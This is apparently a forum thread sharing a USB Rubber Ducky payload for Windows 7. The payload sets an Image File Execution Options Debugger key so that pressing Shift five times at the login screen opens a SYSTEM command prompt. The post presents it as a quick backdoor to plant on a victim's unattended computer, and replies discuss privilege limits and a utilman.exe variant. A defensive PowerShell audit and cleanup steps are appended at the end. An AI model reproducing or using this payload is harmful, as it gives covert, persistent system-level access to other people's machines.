
Allows Any Application To Run On Top Of Windows 7 Login Screen



I know that if you have physical access to a computer, it's pretty much owned. But the reason I wanted to make a rubber ducky payload of this old backdoor is that you only need a few seconds to install the backdoor. I.e. when the victim leaves his/her computer unattended without putting on a screen saver with a password, you put in the rubber ducky and install this payload. After this you can a) press the SHIFT key 5 times in a row or b) press Alt+Shift+PrintScreen, which will open a command prompt with system privilege. Simple and cool :-) Make sure to take a backup of the original sethc.exe.

I have had some encoding issues, be sure to check out which keyboards the rubber ducky firmware supports.

I have edited the code without testing it again, but I think it still will compile and run as planned. Tune the delay parameter for your own pc. I have made the delays long enough for you to see what's happening. Enjoy.

The victim's machine must have admin privileges for this to work.

REM Author: Asbjørn Reglund Thorsen <art@awaresec.no>
REM Target: Tested on Windows 7
REM Description: Replaces the "Sticky keys" on Windows 7's login screen with the "command prompt" executable
REM References: http://carnal0wnage....ticky-keys.html
REM http://www.redmondpi...n-login-screen/
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 1000
ENTER
DELAY 1000
LEFT
DELAY 1000
ENTER
DELAY 1000
STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
STRING /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
DELAY 400
ENTER
REM Notes:
REM Thanks to Espen Grøndal who told me about this "feature"
REM The trick does not work when the Sticky Keys are disabled.
REM If you see the message that says "The operation completed successfully", that means you have installed the backdoor.
REM Cleanup: You can use regedit and browse to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" and remove the sethc.exe key.

Edited by fuzzerman

So how well does the privilege escalation work on your rubber ducky? I mean, does the victim still need to be logged in as administrator for this to work?


So how well does the privilege escalation work on your rubber ducky? I mean, does the victim still need to be logged in as administrator for this to work?

Anyway, the victim should be; it does not depend on the Rubber Ducky, as this is only a HID device like a keyboard.

If the current user does not have admin privileges (not included in the Administrators group) you will never run any program with administrator rights,

as the administrator password will be requested (MENU -> DOWN -> DOWN -> ENTER -> LEFT -> ENTER).


I did something like this already but with the Utility Manager (utilman.exe)... It's a clever way of owning a box, but there are some stability issues when you start running certain programs (such as those that need user directories)..

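As an added defender's check that is not part of this thread: the PowerShell audit below, run from an elevated prompt on a Windows host, lists every Image File Execution Options "Debugger" value, flags the ones set on login-screen accessibility binaries (sethc.exe from the payload above and utilman.exe from the last reply), and verifies the on-disk binaries still carry a valid Authenticode signature, which catches the file-swap variant as well. The list of accessibility binaries is my assumption, not something the thread states.

```powershell
# Audit for IFEO "Debugger" hijacks and replaced accessibility binaries.
# Run in an elevated PowerShell session on the host being checked.
$ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
# Assumed list of binaries reachable from the Windows login screen (hypothetical, not from the thread).
$accessibilityBins = @('sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                       'magnify.exe', 'displayswitch.exe', 'atbroker.exe')

function Get-IfeoDebuggerHijacks {
    # Any Debugger value under IFEO deserves review on a workstation; one on an
    # accessibility binary is the sticky-keys backdoor described in the thread.
    Get-ChildItem -Path $ifeoRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            [pscustomobject]@{
                Image    = $_.PSChildName
                Debugger = $dbg
                Severity = if ($accessibilityBins -contains $_.PSChildName.ToLower()) { 'HIGH' } else { 'REVIEW' }
            }
        }
    }
}

function Test-AccessibilityBinaries {
    # A swapped-in copy of cmd.exe under the sethc.exe/utilman.exe name still has a
    # Microsoft signature, so record the hash too and compare it with a known-good image.
    foreach ($bin in $accessibilityBins) {
        $path = Join-Path $env:SystemRoot "System32\$bin"
        if (-not (Test-Path $path)) { continue }
        $sig = Get-AuthenticodeSignature -FilePath $path
        [pscustomobject]@{
            File   = $path
            Status = $sig.Status
            Signer = $sig.SignerCertificate.Subject
            SHA256 = (Get-FileHash -Path $path -Algorithm SHA256).Hash
        }
    }
}

$hits = Get-IfeoDebuggerHijacks
if ($hits) { $hits | Format-Table -AutoSize } else { 'No IFEO Debugger values found.' }
Test-AccessibilityBinaries | Format-Table -AutoSize
```

A confirmed hijack is removed with `Remove-ItemProperty -Path "$ifeoRoot\sethc.exe" -Name Debugger` (or by deleting the subkey, as the payload's cleanup note says), and a binary whose signature is not Valid or whose hash does not match a clean install should be restored from known-good media.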
